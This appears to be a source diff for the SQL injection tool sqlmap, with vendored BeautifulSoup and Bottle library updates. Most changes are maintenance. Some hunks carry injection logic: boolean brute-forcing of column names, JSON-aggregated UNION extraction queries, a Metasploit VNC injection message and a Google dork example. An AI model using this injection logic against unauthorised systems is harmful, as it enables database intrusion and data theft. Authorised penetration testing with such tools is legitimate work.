get += "%s%s=%s" % (delimiter, name, entry)
|
||||
elif cookie is not None:
|
||||
cookie += "%s%s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, name, value)
|
||||
cookie += "%s%s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, name, entry)
|
||||
|
||||
if not conf.skipUrlEncode:
|
||||
get = urlencode(get, limit=True)
|
||||
@@ -1482,8 +1482,8 @@ class Connect(object):
|
||||
dataToStdout(warnMsg)
|
||||
|
||||
while len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES:
|
||||
value = kb.responseTimePayload.replace(RANDOM_INTEGER_MARKER, str(randomInt(6))).replace(RANDOM_STRING_MARKER, randomStr()) if kb.responseTimePayload else kb.responseTimePayload
|
||||
Connect.queryPage(value=value, content=True, raise404=False)
|
||||
_ = kb.responseTimePayload.replace(RANDOM_INTEGER_MARKER, str(randomInt(6))).replace(RANDOM_STRING_MARKER, randomStr()) if kb.responseTimePayload else kb.responseTimePayload
|
||||
Connect.queryPage(value=_, content=True, raise404=False)
|
||||
dataToStdout('.')
|
||||
|
||||
dataToStdout(" (done)\n")
|
||||
|
||||
@@ -80,7 +80,7 @@ class HTTPSConnection(_http_client.HTTPSConnection):
|
||||
# Reference(s): https://askubuntu.com/a/1263098
|
||||
# https://askubuntu.com/a/1250807
|
||||
_contexts[protocol].set_ciphers("DEFAULT@SECLEVEL=1")
|
||||
except ssl.SSLError:
|
||||
except (ssl.SSLError, AttributeError):
|
||||
pass
|
||||
result = _contexts[protocol].wrap_socket(sock, do_handshake_on_connect=True, server_hostname=self.host if re.search(r"\A[\d.]+\Z", self.host or "") is None else None)
|
||||
if result:
|
||||
|
||||
@@ -204,7 +204,7 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char
|
||||
if limitCond:
|
||||
test = True
|
||||
|
||||
if not stopLimit or stopLimit <= 1:
|
||||
if stopLimit is None or stopLimit <= 1:
|
||||
if Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]):
|
||||
test = False
|
||||
|
||||
|
||||
@@ -196,7 +196,7 @@ class Metasploit(object):
|
||||
|
||||
if Backend.isDbms(DBMS.MYSQL):
|
||||
debugMsg = "by default MySQL on Windows runs as SYSTEM "
|
||||
debugMsg += "user, it is likely that the the VNC "
|
||||
debugMsg += "user, it is likely that the VNC "
|
||||
debugMsg += "injection will be successful"
|
||||
logger.debug(debugMsg)
|
||||
|
||||
|
||||
@@ -37,6 +37,7 @@ from lib.core.common import singleTimeWarnMessage
|
||||
from lib.core.common import unArrayizeValue
|
||||
from lib.core.common import wasLastResponseDBMSError
|
||||
from lib.core.compat import xrange
|
||||
from lib.core.convert import decodeBase64
|
||||
from lib.core.convert import getUnicode
|
||||
from lib.core.convert import htmlUnescape
|
||||
from lib.core.data import conf
|
||||
@@ -126,6 +127,9 @@ def _oneShotUnionUse(expression, unpack=True, limited=False):
|
||||
try:
|
||||
retVal = ""
|
||||
for row in json.loads(output):
|
||||
# NOTE: for cases with automatic MySQL Base64 encoding of JSON array values, like: ["base64:type15:MQ=="]
|
||||
for match in re.finditer(r"base64:type\d+:([^ ]+)", row):
|
||||
row = row.replace(match.group(0), decodeBase64(match.group(1), binary=False))
|
||||
retVal += "%s%s%s" % (kb.chars.start, row, kb.chars.stop)
|
||||
except:
|
||||
retVal = None
|
||||
@@ -254,10 +258,10 @@ def unionUse(expression, unpack=True, dump=False):
|
||||
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ORACLE, DBMS.PGSQL, DBMS.MSSQL, DBMS.SQLITE) and expressionFields and not any((conf.binaryFields, conf.limitStart, conf.limitStop, conf.forcePartial, conf.disableJson)):
|
||||
match = re.search(r"SELECT\s*(.+?)\bFROM", expression, re.I)
|
||||
if match and not (Backend.isDbms(DBMS.ORACLE) and FROM_DUMMY_TABLE[DBMS.ORACLE] in expression) and not re.search(r"\b(MIN|MAX|COUNT)\(", expression):
|
||||
if match and not (Backend.isDbms(DBMS.ORACLE) and FROM_DUMMY_TABLE[DBMS.ORACLE] in expression) and not re.search(r"\b(MIN|MAX|COUNT|EXISTS)\(", expression):
|
||||
kb.jsonAggMode = True
|
||||
if Backend.isDbms(DBMS.MYSQL):
|
||||
query = expression.replace(expressionFields, "CONCAT('%s',JSON_ARRAYAGG(CONCAT_WS('%s',%s)),'%s')" % (kb.chars.start, kb.chars.delimiter, expressionFields, kb.chars.stop), 1)
|
||||
query = expression.replace(expressionFields, "CONCAT('%s',JSON_ARRAYAGG(CONCAT_WS('%s',%s)),'%s')" % (kb.chars.start, kb.chars.delimiter, ','.join(agent.nullAndCastField(field) for field in expressionFieldsList), kb.chars.stop), 1)
|
||||
elif Backend.isDbms(DBMS.ORACLE):
|
||||
query = expression.replace(expressionFields, "'%s'||JSON_ARRAYAGG(%s)||'%s'" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join(expressionFieldsList), kb.chars.stop), 1)
|
||||
elif Backend.isDbms(DBMS.SQLITE):
|
||||
|
||||
@@ -228,93 +228,95 @@ def columnExists(columnFile, regex=None):
|
||||
columns.extend(_addPageTextWords())
|
||||
columns = filterListValue(columns, regex)
|
||||
|
||||
table = safeSQLIdentificatorNaming(conf.tbl, True)
|
||||
for table in conf.tbl.split(','):
|
||||
table = safeSQLIdentificatorNaming(table, True)
|
||||
|
||||
if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
|
||||
table = "%s.%s" % (safeSQLIdentificatorNaming(conf.db), table)
|
||||
if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
|
||||
table = "%s.%s" % (safeSQLIdentificatorNaming(conf.db), table)
|
||||
|
||||
kb.threadContinue = True
|
||||
kb.bruteMode = True
|
||||
kb.threadContinue = True
|
||||
kb.bruteMode = True
|
||||
|
||||
threadData = getCurrentThreadData()
|
||||
threadData.shared.count = 0
|
||||
threadData.shared.limit = len(columns)
|
||||
threadData.shared.files = []
|
||||
|
||||
def columnExistsThread():
|
||||
threadData = getCurrentThreadData()
|
||||
threadData.shared.count = 0
|
||||
threadData.shared.limit = len(columns)
|
||||
threadData.shared.files = []
|
||||
|
||||
while kb.threadContinue:
|
||||
kb.locks.count.acquire()
|
||||
if threadData.shared.count < threadData.shared.limit:
|
||||
column = safeSQLIdentificatorNaming(columns[threadData.shared.count])
|
||||
threadData.shared.count += 1
|
||||
kb.locks.count.release()
|
||||
else:
|
||||
kb.locks.count.release()
|
||||
break
|
||||
def columnExistsThread():
|
||||
threadData = getCurrentThreadData()
|
||||
|
||||
if Backend.isDbms(DBMS.MCKOI):
|
||||
result = inject.checkBooleanExpression(safeStringFormat("0<(SELECT COUNT(%s) FROM %s)", (column, table)))
|
||||
else:
|
||||
result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (column, table)))
|
||||
while kb.threadContinue:
|
||||
kb.locks.count.acquire()
|
||||
|
||||
kb.locks.io.acquire()
|
||||
if threadData.shared.count < threadData.shared.limit:
|
||||
column = safeSQLIdentificatorNaming(columns[threadData.shared.count])
|
||||
threadData.shared.count += 1
|
||||
kb.locks.count.release()
|
||||
else:
|
||||
kb.locks.count.release()
|
||||
break
|
||||
|
||||
if result:
|
||||
threadData.shared.files.append(column)
|
||||
if Backend.isDbms(DBMS.MCKOI):
|
||||
result = inject.checkBooleanExpression(safeStringFormat("0<(SELECT COUNT(%s) FROM %s)", (column, table)))
|
||||
else:
|
||||
result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (column, table)))
|
||||
|
||||
if conf.verbose in (1, 2) and not conf.api:
|
||||
clearConsoleLine(True)
|
||||
infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column))
|
||||
dataToStdout(infoMsg, True)
|
||||
kb.locks.io.acquire()
|
||||
|
||||
if conf.verbose in (1, 2):
|
||||
status = "%d/%d items (%d%%)" % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit))
|
||||
dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True)
|
||||
if result:
|
||||
threadData.shared.files.append(column)
|
||||
|
||||
kb.locks.io.release()
|
||||
if conf.verbose in (1, 2) and not conf.api:
|
||||
clearConsoleLine(True)
|
||||
infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column))
|
||||
dataToStdout(infoMsg, True)
|
||||
|
||||
try:
|
||||
runThreads(conf.threads, columnExistsThread, threadChoice=True)
|
||||
except KeyboardInterrupt:
|
||||
warnMsg = "user aborted during column existence "
|
||||
warnMsg += "check. sqlmap will display partial output"
|
||||
logger.warning(warnMsg)
|
||||
finally:
|
||||
kb.bruteMode = False
|
||||
if conf.verbose in (1, 2):
|
||||
status = "%d/%d items (%d%%)" % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit))
|
||||
dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True)
|
||||
|
||||
clearConsoleLine(True)
|
||||
dataToStdout("\n")
|
||||
kb.locks.io.release()
|
||||
|
||||
if not threadData.shared.files:
|
||||
warnMsg = "no column(s) found"
|
||||
logger.warning(warnMsg)
|
||||
else:
|
||||
columns = {}
|
||||
try:
|
||||
runThreads(conf.threads, columnExistsThread, threadChoice=True)
|
||||
except KeyboardInterrupt:
|
||||
warnMsg = "user aborted during column existence "
|
||||
warnMsg += "check. sqlmap will display partial output"
|
||||
logger.warning(warnMsg)
|
||||
finally:
|
||||
kb.bruteMode = False
|
||||
|
||||
for column in threadData.shared.files:
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL,):
|
||||
result = not inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE %s REGEXP '[^0-9]')", (column, table, column)))
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE,):
|
||||
result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE %s NOT GLOB '*[^0-9]*')", (column, table, column)))
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.MCKOI,):
|
||||
result = inject.checkBooleanExpression("%s" % safeStringFormat("0=(SELECT MAX(%s)-MAX(%s) FROM %s)", (column, column, table)))
|
||||
else:
|
||||
result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column)))
|
||||
clearConsoleLine(True)
|
||||
dataToStdout("\n")
|
||||
|
||||
if result:
|
||||
columns[column] = "numeric"
|
||||
else:
|
||||
columns[column] = "non-numeric"
|
||||
if not threadData.shared.files:
|
||||
warnMsg = "no column(s) found"
|
||||
logger.warning(warnMsg)
|
||||
else:
|
||||
columns = {}
|
||||
|
||||
kb.data.cachedColumns[conf.db] = {conf.tbl: columns}
|
||||
for column in threadData.shared.files:
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL,):
|
||||
result = not inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE %s REGEXP '[^0-9]')", (column, table, column)))
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE,):
|
||||
result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE %s NOT GLOB '*[^0-9]*')", (column, table, column)))
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.MCKOI,):
|
||||
result = inject.checkBooleanExpression("%s" % safeStringFormat("0=(SELECT MAX(%s)-MAX(%s) FROM %s)", (column, column, table)))
|
||||
else:
|
||||
result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column)))
|
||||
|
||||
for _ in ((conf.db, conf.tbl, item[0], item[1]) for item in columns.items()):
|
||||
if _ not in kb.brute.columns:
|
||||
kb.brute.columns.append(_)
|
||||
if result:
|
||||
columns[column] = "numeric"
|
||||
else:
|
||||
columns[column] = "non-numeric"
|
||||
|
||||
hashDBWrite(HASHDB_KEYS.KB_BRUTE_COLUMNS, kb.brute.columns, True)
|
||||
kb.data.cachedColumns[conf.db] = {table: columns}
|
||||
|
||||
for _ in ((conf.db, table, item[0], item[1]) for item in columns.items()):
|
||||
if _ not in kb.brute.columns:
|
||||
kb.brute.columns.append(_)
|
||||
|
||||
hashDBWrite(HASHDB_KEYS.KB_BRUTE_COLUMNS, kb.brute.columns, True)
|
||||
|
||||
return kb.data.cachedColumns
|
||||
|
||||
|
||||
@@ -77,7 +77,7 @@ class Fingerprint(GenericFingerprint):
|
||||
|
||||
if not result:
|
||||
warnMsg = "the back-end DBMS is not %s" % DBMS.CLICKHOUSE
|
||||
logger.warn(warnMsg)
|
||||
logger.warning(warnMsg)
|
||||
|
||||
return False
|
||||
|
||||
@@ -86,6 +86,6 @@ class Fingerprint(GenericFingerprint):
|
||||
return True
|
||||
else:
|
||||
warnMsg = "the back-end DBMS is not %s" % DBMS.CLICKHOUSE
|
||||
logger.warn(warnMsg)
|
||||
logger.warning(warnMsg)
|
||||
|
||||
return False
|
||||
|
||||
@@ -45,10 +45,12 @@ class Fingerprint(GenericFingerprint):
|
||||
# Reference: https://dev.mysql.com/doc/relnotes/mysql/<major>.<minor>/en/
|
||||
|
||||
versions = (
|
||||
(80300, 80302), # MySQL 8.3
|
||||
(80200, 80202), # MySQL 8.2
|
||||
(80100, 80102), # MySQL 8.1
|
||||
(80000, 80035), # MySQL 8.0
|
||||
(80000, 80037), # MySQL 8.0
|
||||
(60000, 60014), # MySQL 6.0
|
||||
(50700, 50744), # MySQL 5.7
|
||||
(50700, 50745), # MySQL 5.7
|
||||
(50600, 50652), # MySQL 5.6
|
||||
(50500, 50563), # MySQL 5.5
|
||||
(50400, 50404), # MySQL 5.4
|
||||
|
||||
@@ -33,8 +33,8 @@ class Connector(GenericConnector):
|
||||
|
||||
def connect(self):
|
||||
self.initConnection()
|
||||
self.__dsn = cx_Oracle.makedsn(self.hostname, self.port, self.db)
|
||||
self.__dsn = getText(self.__dsn)
|
||||
# Reference: https://cx-oracle.readthedocs.io/en/latest/user_guide/connection_handling.html
|
||||
self.__dsn = "%s:%d/%s" % (self.hostname, self.port, self.db)
|
||||
self.user = getText(self.user)
|
||||
self.password = getText(self.password)
|
||||
|
||||
|
||||
@@ -13,7 +13,10 @@ import sys
|
||||
from lib.core.common import Backend
|
||||
from lib.core.common import dataToStdout
|
||||
from lib.core.common import getSQLSnippet
|
||||
from lib.core.common import isListLike
|
||||
from lib.core.common import isStackingAvailable
|
||||
from lib.core.common import joinValue
|
||||
from lib.core.compat import xrange
|
||||
from lib.core.convert import getUnicode
|
||||
from lib.core.data import conf
|
||||
from lib.core.data import logger
|
||||
@@ -41,6 +44,7 @@ class Custom(object):
|
||||
sqlType = None
|
||||
query = query.rstrip(';')
|
||||
|
||||
|
||||
try:
|
||||
for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
|
||||
for sqlStatement in sqlStatements:
|
||||
@@ -61,6 +65,11 @@ class Custom(object):
|
||||
|
||||
output = inject.getValue(query, fromUser=True)
|
||||
|
||||
if sqlType and "SELECT" in sqlType and isListLike(output):
|
||||
for i in xrange(len(output)):
|
||||
if isListLike(output[i]):
|
||||
output[i] = joinValue(output[i])
|
||||
|
||||
return output
|
||||
elif not isStackingAvailable() and not conf.direct:
|
||||
warnMsg = "execution of non-query SQL statements is only "
|
||||
|
||||
@@ -325,7 +325,7 @@ class Databases(object):
|
||||
|
||||
if not isNoneValue(table):
|
||||
db = safeSQLIdentificatorNaming(db)
|
||||
table = safeSQLIdentificatorNaming(table, True)
|
||||
table = safeSQLIdentificatorNaming(table, True).strip()
|
||||
|
||||
if conf.getComments:
|
||||
_ = queries[Backend.getIdentifiedDbms()].table_comment
|
||||
@@ -948,7 +948,7 @@ class Databases(object):
|
||||
self.getTables()
|
||||
|
||||
infoMsg = "fetched tables: "
|
||||
infoMsg += ", ".join(["%s" % ", ".join("'%s%s%s'" % (unsafeSQLIdentificatorNaming(db), ".." if Backend.isDbms(DBMS.MSSQL) or Backend.isDbms(DBMS.SYBASE) else '.', unsafeSQLIdentificatorNaming(_)) for _ in tbl) for db, tbl in kb.data.cachedTables.items()])
|
||||
infoMsg += ", ".join(["%s" % ", ".join("'%s%s%s'" % (unsafeSQLIdentificatorNaming(db), ".." if Backend.isDbms(DBMS.MSSQL) or Backend.isDbms(DBMS.SYBASE) else '.', unsafeSQLIdentificatorNaming(_)) if db else "'%s'" % unsafeSQLIdentificatorNaming(_) for _ in tbl) for db, tbl in kb.data.cachedTables.items()])
|
||||
logger.info(infoMsg)
|
||||
|
||||
for db, tables in kb.data.cachedTables.items():
|
||||
|
||||
@@ -115,7 +115,7 @@ class Entries(object):
|
||||
if kb.dumpKeyboardInterrupt:
|
||||
break
|
||||
|
||||
if conf.exclude and re.search(conf.exclude, tbl, re.I) is not None:
|
||||
if conf.exclude and re.search(conf.exclude, unsafeSQLIdentificatorNaming(tbl), re.I) is not None:
|
||||
infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl)
|
||||
singleTimeLogMessage(infoMsg)
|
||||
continue
|
||||
@@ -134,12 +134,14 @@ class Entries(object):
|
||||
kb.dumpTable = "%s:%s" % (conf.db, tbl)
|
||||
elif Backend.isDbms(DBMS.SQLITE):
|
||||
kb.dumpTable = tbl
|
||||
elif METADB_SUFFIX.upper() in conf.db.upper():
|
||||
kb.dumpTable = tbl
|
||||
else:
|
||||
kb.dumpTable = "%s.%s" % (conf.db, tbl)
|
||||
|
||||
if safeSQLIdentificatorNaming(conf.db) not in kb.data.cachedColumns or safeSQLIdentificatorNaming(tbl, True) not in kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] or not kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]:
|
||||
warnMsg = "unable to enumerate the columns for table '%s'" % unsafeSQLIdentificatorNaming(tbl)
|
||||
if METADB_SUFFIX not in conf.db:
|
||||
if METADB_SUFFIX.upper() not in conf.db.upper():
|
||||
warnMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
|
||||
warnMsg += ", skipping" if len(tblList) > 1 else ""
|
||||
logger.warning(warnMsg)
|
||||
@@ -154,7 +156,7 @@ class Entries(object):
|
||||
|
||||
if not colList:
|
||||
warnMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl)
|
||||
if METADB_SUFFIX not in conf.db:
|
||||
if METADB_SUFFIX.upper() not in conf.db.upper():
|
||||
warnMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
|
||||
warnMsg += " (no usable column names)"
|
||||
logger.warning(warnMsg)
|
||||
@@ -168,7 +170,7 @@ class Entries(object):
|
||||
if conf.col:
|
||||
infoMsg += " of column(s) '%s'" % colNames
|
||||
infoMsg += " for table '%s'" % unsafeSQLIdentificatorNaming(tbl)
|
||||
if METADB_SUFFIX not in conf.db:
|
||||
if METADB_SUFFIX.upper() not in conf.db.upper():
|
||||
infoMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
|
||||
logger.info(infoMsg)
|
||||
|
||||
|
||||
@@ -27,8 +27,8 @@ requestFile =
|
||||
|
||||
# Rather than providing a target URL, let Google return target
|
||||
# hosts as result of your Google dork expression. For a list of Google
|
||||
# dorks see Johnny Long Google Hacking Database at
|
||||
# http://johnny.ihackstuff.com/ghdb.php.
|
||||
# dorks see Google Hacking Database at
|
||||
# https://www.exploit-db.com/google-hacking-database
|
||||
# Example: +ext:php +inurl:"&id=" +intext:"powered by "
|
||||
googleDork =
|
||||
|
||||
|
||||
@@ -437,7 +437,7 @@ def main():
|
||||
raise SystemExit
|
||||
|
||||
elif any(_ in errMsg for _ in (": 9.9.9#",)):
|
||||
errMsg = "LOL :)"
|
||||
errMsg = "LOL xD"
|
||||
logger.critical(errMsg)
|
||||
raise SystemExit
|
||||
|
||||
|
||||
@@ -98,7 +98,7 @@ def main():
|
||||
apiparser.add_argument("-s", "--server", help="Run as a REST-JSON API server", action="store_true")
|
||||
apiparser.add_argument("-c", "--client", help="Run as a REST-JSON API client", action="store_true")
|
||||
apiparser.add_argument("-H", "--host", help="Host of the REST-JSON API server (default \"%s\")" % RESTAPI_DEFAULT_ADDRESS, default=RESTAPI_DEFAULT_ADDRESS)
|
||||
apiparser.add_argument("-p", "--port", help="Port of the the REST-JSON API server (default %d)" % RESTAPI_DEFAULT_PORT, default=RESTAPI_DEFAULT_PORT, type=int)
|
||||
apiparser.add_argument("-p", "--port", help="Port of the REST-JSON API server (default %d)" % RESTAPI_DEFAULT_PORT, default=RESTAPI_DEFAULT_PORT, type=int)
|
||||
apiparser.add_argument("--adapter", help="Server (bottle) adapter to use (default \"%s\")" % RESTAPI_DEFAULT_ADAPTER, default=RESTAPI_DEFAULT_ADAPTER)
|
||||
apiparser.add_argument("--database", help="Set IPC database filepath (optional)")
|
||||
apiparser.add_argument("--username", help="Basic authentication username (optional)")
|
||||
|
||||
2
thirdparty/beautifulsoup/__init__.py
vendored
2
thirdparty/beautifulsoup/__init__.py
vendored
@@ -16,7 +16,7 @@
|
||||
# disclaimer in the documentation and/or other materials provided
|
||||
# with the distribution.
|
||||
#
|
||||
# * Neither the name of the the Beautiful Soup Consortium and All
|
||||
# * Neither the name of the Beautiful Soup Consortium and All
|
||||
# Night Kosher Bakery nor the names of its contributors may be
|
||||
# used to endorse or promote products derived from this software
|
||||
# without specific prior written permission.
|
||||
|
||||
10
thirdparty/beautifulsoup/beautifulsoup.py
vendored
10
thirdparty/beautifulsoup/beautifulsoup.py
vendored
@@ -58,7 +58,7 @@ met:
|
||||
disclaimer in the documentation and/or other materials provided
|
||||
with the distribution.
|
||||
|
||||
* Neither the name of the the Beautiful Soup Consortium and All
|
||||
* Neither the name of the Beautiful Soup Consortium and All
|
||||
Night Kosher Bakery nor the names of its contributors may be
|
||||
used to endorse or promote products derived from this software
|
||||
without specific prior written permission.
|
||||
@@ -80,7 +80,7 @@ from __future__ import generators
|
||||
from __future__ import print_function
|
||||
|
||||
__author__ = "Leonard Richardson (leonardr@segfault.org)"
|
||||
__version__ = "3.2.1"
|
||||
__version__ = "3.2.1b"
|
||||
__copyright__ = "Copyright (c) 2004-2012 Leonard Richardson"
|
||||
__license__ = "New-style BSD"
|
||||
|
||||
@@ -93,14 +93,16 @@ if sys.version_info >= (3, 0):
|
||||
text_type = str
|
||||
binary_type = bytes
|
||||
basestring = str
|
||||
unichr = chr
|
||||
else:
|
||||
text_type = unicode
|
||||
binary_type = str
|
||||
|
||||
try:
|
||||
from htmlentitydefs import name2codepoint
|
||||
from html.entities import name2codepoint
|
||||
except ImportError:
|
||||
name2codepoint = {}
|
||||
from htmlentitydefs import name2codepoint
|
||||
|
||||
try:
|
||||
set
|
||||
except NameError:
|
||||
|
||||
424
thirdparty/bottle/bottle.py
vendored
424
thirdparty/bottle/bottle.py
vendored
@@ -69,7 +69,7 @@ if __name__ == '__main__':
|
||||
# Imports and Python 2/3 unification ##########################################
|
||||
###############################################################################
|
||||
|
||||
import base64, calendar, cgi, email.utils, functools, hmac, itertools,\
|
||||
import base64, calendar, email.utils, functools, hmac, itertools,\
|
||||
mimetypes, os, re, tempfile, threading, time, warnings, weakref, hashlib
|
||||
|
||||
from types import FunctionType
|
||||
@@ -94,6 +94,7 @@ if py3k:
|
||||
from urllib.parse import urlencode, quote as urlquote, unquote as urlunquote
|
||||
urlunquote = functools.partial(urlunquote, encoding='latin1')
|
||||
from http.cookies import SimpleCookie, Morsel, CookieError
|
||||
from collections import defaultdict
|
||||
from collections.abc import MutableMapping as DictMixin
|
||||
from types import ModuleType as new_module
|
||||
import pickle
|
||||
@@ -126,7 +127,7 @@ else: # 2.x
|
||||
from imp import new_module
|
||||
from StringIO import StringIO as BytesIO
|
||||
import ConfigParser as configparser
|
||||
from collections import MutableMapping as DictMixin
|
||||
from collections import MutableMapping as DictMixin, defaultdict
|
||||
from inspect import getargspec
|
||||
|
||||
unicode = unicode
|
||||
@@ -1137,6 +1138,399 @@ class Bottle(object):
|
||||
# HTTP and WSGI Tools ##########################################################
|
||||
###############################################################################
|
||||
|
||||
# Multipart parsing stuff
|
||||
|
||||
class StopMarkupException(BottleException):
|
||||
pass
|
||||
|
||||
|
||||
HYPHEN = tob('-')
|
||||
CR = tob('\r')
|
||||
LF = tob('\n')
|
||||
CRLF = CR + LF
|
||||
LFCRLF = LF + CR + LF
|
||||
HYPHENx2 = HYPHEN * 2
|
||||
CRLFx2 = CRLF * 2
|
||||
CRLF_LEN = len(CRLF)
|
||||
CRLFx2_LEN = len(CRLFx2)
|
||||
|
||||
MULTIPART_BOUNDARY_PATT = re.compile(r'^multipart/.+?boundary=(.+?)(;|$)')
|
||||
|
||||
class MPHeadersEaeter:
|
||||
end_headers_patt = re.compile(tob(r'(\r\n\r\n)|(\r(\n\r?)?)$'))
|
||||
|
||||
def __init__(self):
|
||||
self.headers_end_expected = None
|
||||
self.eat_meth = self._eat_first_crlf_or_last_hyphens
|
||||
self._meth_map = {
|
||||
CR: self._eat_lf,
|
||||
HYPHEN: self._eat_last_hyphen
|
||||
}
|
||||
self.stopped = False
|
||||
|
||||
def eat(self, chunk, base):
|
||||
pos = self.eat_meth(chunk, base)
|
||||
if pos is None: return
|
||||
if self.eat_meth != self._eat_headers:
|
||||
if self.stopped:
|
||||
raise StopMarkupException()
|
||||
base = pos
|
||||
self.eat_meth = self._eat_headers
|
||||
return self.eat(chunk, base)
|
||||
# found headers section end, reset eater
|
||||
self.eat_meth = self._eat_first_crlf_or_last_hyphens
|
||||
return pos
|
||||
|
||||
def _eat_last_hyphen(self, chunk, base):
|
||||
chunk_start = chunk[base: base + 2]
|
||||
if not chunk_start: return
|
||||
if chunk_start == HYPHEN:
|
||||
self.stopped = True
|
||||
return base + 1
|
||||
raise HTTPError(422, 'Last hyphen was expected, got (first 2 symbols slice): %s' % chunk_start)
|
||||
|
||||
def _eat_lf(self, chunk, base):
|
||||
chunk_start = chunk[base: base + 1]
|
||||
if not chunk_start: return
|
||||
if chunk_start == LF: return base + 1
|
||||
invalid_sequence = CR + chunk_start
|
||||
raise HTTPError(422, 'Malformed headers, found invalid sequence: %s' % invalid_sequence)
|
||||
|
||||
def _eat_first_crlf_or_last_hyphens(self, chunk, base):
|
||||
chunk_start = chunk[base: base + 2]
|
||||
if not chunk_start: return
|
||||
if chunk_start == CRLF: return base + 2
|
||||
if len(chunk_start) == 1:
|
||||
self.eat_meth = self._meth_map.get(chunk_start)
|
||||
elif chunk_start == HYPHENx2:
|
||||
self.stopped = True
|
||||
return base + 2
|
||||
if self.eat_meth is None:
|
||||
raise HTTPError(422, 'Malformed headers, invalid section start: %s' % chunk_start)
|
||||
|
||||
def _eat_headers(self, chunk, base):
|
||||
expected = self.headers_end_expected
|
||||
if expected is not None:
|
||||
expected_len = len(expected)
|
||||
chunk_start = chunk[base:expected_len]
|
||||
if chunk_start == expected:
|
||||
self.headers_end_expected = None
|
||||
return base + expected_len - CRLFx2_LEN
|
||||
chunk_start_len = len(chunk_start)
|
||||
if not chunk_start_len: return
|
||||
if chunk_start_len < expected_len:
|
||||
if expected.startswith(chunk_start):
|
||||
self.headers_end_expected = expected[chunk_start_len:]
|
||||
return
|
||||
self.headers_end_expected = None
|
||||
if expected == LF: # we saw CRLFCR
|
||||
invalid_sequence = CR + chunk_start[0:1]
|
||||
# NOTE we don not catch all CRLF-malformed errors, but only obvious ones
|
||||
# to stop doing useless work
|
||||
raise HTTPError(422, 'Malformed headers, found invalid sequence: %s' % invalid_sequence)
|
||||
else:
|
||||
assert expected_len >= 2 # (CR)LFCRLF or (CRLF)CRLF
|
||||
self.headers_end_expected = None
|
||||
assert self.headers_end_expected is None
|
||||
s = self.end_headers_patt.search(chunk, base)
|
||||
if s is None: return
|
||||
end_found = s.start(1)
|
||||
if end_found >= 0: return end_found
|
||||
end_head = s.group(2)
|
||||
if end_head is not None:
|
||||
self.headers_end_expected = CRLFx2[len(end_head):]
|
||||
|
||||
|
||||
class MPBodyMarkup:
|
||||
def __init__(self, boundary):
|
||||
self.markups = []
|
||||
self.error = None
|
||||
if CR in boundary:
|
||||
raise HTTPError(422, 'The `CR` must not be in the boundary: %s' % boundary)
|
||||
boundary = HYPHENx2 + boundary
|
||||
self.boundary = boundary
|
||||
token = CRLF + boundary
|
||||
self.tlen = len(token)
|
||||
self.token = token
|
||||
self.trest = self.trest_len = None
|
||||
self.abspos = 0
|
||||
self.abs_start_section = 0
|
||||
self.headers_eater = MPHeadersEaeter()
|
||||
self.cur_meth = self._eat_start_boundary
|
||||
self._eat_headers = self.headers_eater.eat
|
||||
self.stopped = False
|
||||
self.idx = idx = defaultdict(list) # 1-based indices for each token symbol
|
||||
for i, c in enumerate(token, start=1):
|
||||
idx[c].append([i, token[:i]])
|
||||
|
||||
def _match_tail(self, s, start, end):
|
||||
idxs = self.idx.get(s[end - 1])
|
||||
if idxs is None: return
|
||||
slen = end - start
|
||||
assert slen <= self.tlen
|
||||
for i, thead in idxs: # idxs is 1-based index
|
||||
search_pos = slen - i
|
||||
if search_pos < 0: return
|
||||
if s[start + search_pos:end] == thead: return i # if s_tail == token_head
|
||||
|
||||
def _iter_markup(self, chunk):
|
||||
if self.stopped:
|
||||
